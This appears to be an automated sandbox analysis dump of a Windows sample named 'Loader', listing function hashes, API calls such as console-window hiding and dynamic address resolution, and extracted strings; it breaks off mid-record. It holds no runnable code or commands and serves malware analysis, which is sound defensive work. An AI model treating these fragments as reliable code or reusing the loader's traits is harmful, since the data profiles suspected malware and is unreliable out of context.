                                                                                                  • Instruction ID: cf4270bf8ffc7a5f823e8d7e11b60e879aec5e144cc898fab687690e48e742b5
                                                                                                  • Opcode Fuzzy Hash: ea0acaf6d4cacd1ba90045e13a6227656fbadf6fad3af0bdaba31410a1091882
                                                                                                  • Instruction Fuzzy Hash: 9291066150C7C1CDE3368638845879BBED11BA7218F088AADD5ED8B2D3C7BA4509CB67
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocString
                                                                                                  • String ID: $"$"$'$'$*$+$+$/$0$4$6$8$:$<$=$=$A$C$E$G$H$I$I$K$M$M$O$O$Q$S$S$U$W$Y$[$]$_$i$k$m$o
                                                                                                  • API String ID: 2525500382-871300800
                                                                                                  • Opcode ID: e45984be38196b5c8ff72e5588430cd25e3479d51ec099cdc983a58aa1c9b1d2
                                                                                                  • Instruction ID: 865d247f53da1c212b644144c37fe5ba321bca7ef231fb23b2e03194a57c13c3
                                                                                                  • Opcode Fuzzy Hash: e45984be38196b5c8ff72e5588430cd25e3479d51ec099cdc983a58aa1c9b1d2
                                                                                                  • Instruction Fuzzy Hash: 5C91E76110C7C18DE3368638885879BBED11BA7218F188A9DD1ED8B2D3C6BA454AC767
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearInit
                                                                                                  • String ID: Z$a$c$g$n$p$p$s$t$w${$~
                                                                                                  • API String ID: 2610073882-3241135356
                                                                                                  • Opcode ID: e4bafa1799fc74d6fdec72762fe4337596049604b772f4dce9c6462e0ef1b261
                                                                                                  • Instruction ID: 5cfd81fbbfab52470edc20309123d5fdb3929ff031e16fa1184257613a9df237
                                                                                                  • Opcode Fuzzy Hash: e4bafa1799fc74d6fdec72762fe4337596049604b772f4dce9c6462e0ef1b261
                                                                                                  • Instruction Fuzzy Hash: 56412A7550D3C0CAE366CB28C49878FBFE26BD6308F58885CE5C50B396D6BA9509C763
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitVariant
                                                                                                  • String ID: Z$a$c$g$n$p$p$s$t$w${$~
                                                                                                  • API String ID: 1927566239-3241135356
                                                                                                  • Opcode ID: 75c46943b2651eac38ca81ac704b743c7024d952c1a77a819c42d2055e78dec7
                                                                                                  • Instruction ID: 5e74e55bfebdbfff89dcf67c6b6cd9f6728498efe2e3599b3f27d88dd375cd61
                                                                                                  • Opcode Fuzzy Hash: 75c46943b2651eac38ca81ac704b743c7024d952c1a77a819c42d2055e78dec7
                                                                                                  • Instruction Fuzzy Hash: 9D414F7150D3C0CEE366CB28C49874BBFE25BD6308F49889DE5C44B396C6BA9509C763
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 127012223-0
                                                                                                  • Opcode ID: faba2e0aeb08988ce597c14e0d18844319d8186c25003ae25296770dfa04f0e8
                                                                                                  • Instruction ID: 11e5b0f80727d720d7a681db30d0104bce72141b0221337bb37e214791b2014c
                                                                                                  • Opcode Fuzzy Hash: faba2e0aeb08988ce597c14e0d18844319d8186c25003ae25296770dfa04f0e8
                                                                                                  • Instruction Fuzzy Hash: 1571D4729006099BEF21BFA48D41BAF77B6EF65710F144057E905E7191E7759C00C7A2
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00A6FE70
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A6FE9C
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00A6FEDB
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A6FEF8
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A6FF37
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A6FF54
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A6FF96
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A6FFB9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                  • String ID:
                                                                                                  • API String ID: 2040435927-0
                                                                                                  • Opcode ID: 65acbc42aff8fefa1656c38171950527f6def969f1c50ab97b060a9f33e328e2
                                                                                                  • Instruction ID: 787545d4c174d215d3a2d29993570a68daf91bba26b3e29d2483b683c2b4d487
                                                                                                  • Opcode Fuzzy Hash: 65acbc42aff8fefa1656c38171950527f6def969f1c50ab97b060a9f33e328e2
                                                                                                  • Instruction Fuzzy Hash: 10519E7260021AAFEB209F64EC45FAB7BB9EF41754F24443AF914DA1A0DB71DC11CB50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213747228-0
                                                                                                  • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                  • Instruction ID: eb7bc9b13de82987534d16cd792a0e483e4477f9a58ecb627fbf7690d8c64da0
                                                                                                  • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                  • Instruction Fuzzy Hash: 4DB13A72A00395AFDB15CF64CC81BAE7BA5EF59310F14C1A5E948AB382E774DE01C7A0
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00A70D77
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00A70D7F
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00A70E08
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00A70E33
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00A70E88
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                  • Opcode ID: ff69c728863583f3305d48ef47d0c3244be0d9d10ddca35e46beaca276af3789
                                                                                                  • Instruction ID: d65053e9085c23ba8ef7f951131a3bc03213f1e5412165dba6542176dbc66257
                                                                                                  • Opcode Fuzzy Hash: ff69c728863583f3305d48ef47d0c3244be0d9d10ddca35e46beaca276af3789
                                                                                                  • Instruction Fuzzy Hash: 8441C470A00218EBCF10DF68CC44E9E7BB5AF44314F14C565E91C9B352D735AD11CB91
                                                                                                  APIs
                                                                                                  • GetConsoleWindow.KERNEL32 ref: 00A624DD
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00A624E6
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A62524
                                                                                                    • Part of subcall function 00A6F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00A6253A,?,?,00000000), ref: 00A6F129
                                                                                                    • Part of subcall function 00A6F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00A6253A,?,?,00000000), ref: 00A6F142
                                                                                                    • Part of subcall function 00A6F11D: CloseHandle.KERNEL32(?,?,?,00A6253A,?,?,00000000), ref: 00A6F154
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A62567
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A62578
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A62589
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A6259A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 3956949563-0
                                                                                                  • Opcode ID: 32fa039e52c1481b5fc518587154435257540382eea760bd2ca77a920abdf109
                                                                                                  • Instruction ID: 29c4f45dba6ae7a393e4c049b3eb0e53760638dce8611630b34c9950a54ab5d2
                                                                                                  • Opcode Fuzzy Hash: 32fa039e52c1481b5fc518587154435257540382eea760bd2ca77a920abdf109
                                                                                                  • Instruction Fuzzy Hash: 4D21A6F2D402159BDF10EFE4DD06BDEBBB8AF04710F080125F508BA291E7B6A554CBA2
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,00A7D01A,00A61170,00A6AA08,?,?), ref: 00A7CFCC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                  • API String ID: 3664257935-537541572
                                                                                                  • Opcode ID: 53f9f9bcd6beefac87cea917f67799473b82397b6e24dba9fc1eaecf5712e1f0
                                                                                                  • Instruction ID: a035bb5aa3fb1a46ed4adbaf03e2693470cd42fc26d412159a623982b854405f
                                                                                                  • Opcode Fuzzy Hash: 53f9f9bcd6beefac87cea917f67799473b82397b6e24dba9fc1eaecf5712e1f0
                                                                                                  • Instruction Fuzzy Hash: 22210A32B01311ABCB21DBA5DC41A5A776AEF417B0F25C11AF91EE7290DB30ED01C6D0
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A70086
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00A70094
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00A700A5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                  • API String ID: 667068680-1047828073
                                                                                                  • Opcode ID: 9bbeeed27703f8d5414faa8f3fbfb7decbdd986c37e7485e911a747012ce3ad9
                                                                                                  • Instruction ID: 55d2eb0944562f44c71735abc53541cb09506e6767333cdc5eb24fbb20b2493d
                                                                                                  • Opcode Fuzzy Hash: 9bbeeed27703f8d5414faa8f3fbfb7decbdd986c37e7485e911a747012ce3ad9
                                                                                                  • Instruction Fuzzy Hash: 5FD09E327456107B8B11DFF87C0D99A3AF9FE097123018953F545D2250DE7049028654
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 71315ed5b340ecf7c63204546eb2f78f00b35c1db1b905aba7acef9299d7f454
                                                                                                  • Instruction ID: f889dceaffeddcf834b886162409c225d62adc01dc9479db5e742a8249d27a29
                                                                                                  • Opcode Fuzzy Hash: 71315ed5b340ecf7c63204546eb2f78f00b35c1db1b905aba7acef9299d7f454
                                                                                                  • Instruction Fuzzy Hash: 4BB1F374E04A49AFDB11EFB8CD80BADBBB1BF45304F148159F9049B292DB719D42CBA0
                                                                                                  APIs
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69C97
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69CA8
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69CBC
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69CDD
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69CEE
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A69D06
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                                  • String ID:
                                                                                                  • API String ID: 2134207285-0
                                                                                                  • Opcode ID: 3e45838885fe72069fb55c78d5db3d075a26689a20c9ad07a17d23db2859e61d
                                                                                                  • Instruction ID: 2986e33cfc5d2197ecf166a884487921be5f6d9d35d5450ec26dff1ab1986b1c
                                                                                                  • Opcode Fuzzy Hash: 3e45838885fe72069fb55c78d5db3d075a26689a20c9ad07a17d23db2859e61d
                                                                                                  • Instruction Fuzzy Hash: B841D2B5900740CFDB30DB648A027AFB7F8AF45720F18062DE57A6A2D1D771A944CBA2
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00A7ACDE,00A70760,00A6B77F,BB40E64E,?,?,?,?,00A8BFCA,000000FF), ref: 00A7ACF5
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A7AD03
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A7AD1C
                                                                                                  • SetLastError.KERNEL32(00000000,?,00A7ACDE,00A70760,00A6B77F,BB40E64E,?,?,?,?,00A8BFCA,000000FF), ref: 00A7AD6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: 2e18fe598e9460c25c93ce1cacc045ed7a77a08e96545fcdb7b1fe5af844c6f8
                                                                                                  • Instruction ID: f593dbdb730d3a467935ff141c0dabc0b915a7cab33bf6af1506bfcfe99c68f6
                                                                                                  • Opcode Fuzzy Hash: 2e18fe598e9460c25c93ce1cacc045ed7a77a08e96545fcdb7b1fe5af844c6f8
                                                                                                  • Instruction Fuzzy Hash: DC01283232A615BEBB3437B47D85A6E2794EB51FB6720C22BF61C445F2EF114C039251
                                                                                                  APIs
                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00A7B68D
                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00A7B906
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 2673424686-393685449
                                                                                                  • Opcode ID: 5d73bcb8efd0a2a17f9a8e7ed2bbae9e9a6fd8fccf004fa0c2c1b271d5f70e01
                                                                                                  • Instruction ID: da6554835e79643d8ef67698ec85b8e3bd82f00eb2f393e9b9202f50b7e08e26
                                                                                                  • Opcode Fuzzy Hash: 5d73bcb8efd0a2a17f9a8e7ed2bbae9e9a6fd8fccf004fa0c2c1b271d5f70e01
                                                                                                  • Instruction Fuzzy Hash: 69B17BB1810209EFCF15DFA4CD81AAEB7B9BF54310F10C55AF9196B212D731DA61CBA2
                                                                                                  APIs
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6BF44
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6C028
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DecrefRef_count_base::_std::_
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 1456557076-2671469338
                                                                                                  • Opcode ID: 57025f3721cb908a8ba8b356ea9a3894314907347c22dd39202feb10ac1d29ac
                                                                                                  • Instruction ID: 995849ce19085f9cebc3838a686c158f25b465363003b5a1e88ca751040c8dd6
                                                                                                  • Opcode Fuzzy Hash: 57025f3721cb908a8ba8b356ea9a3894314907347c22dd39202feb10ac1d29ac
                                                                                                  • Instruction Fuzzy Hash: 3441BF74910205DFCF28DF68CA459AEB7B9BF58300B58805DE449E7662C734EA84CF61
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00A8BE94,000000FF,?,00A75685,00A7556C,?,00A75721,00000000), ref: 00A755F9
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A7560B
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00A8BE94,000000FF,?,00A75685,00A7556C,?,00A75721,00000000), ref: 00A7562D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: ed6fe54501dfe6df9cc461f9b4d3138f08fc0ba36553a3893d8638b531f1e4ca
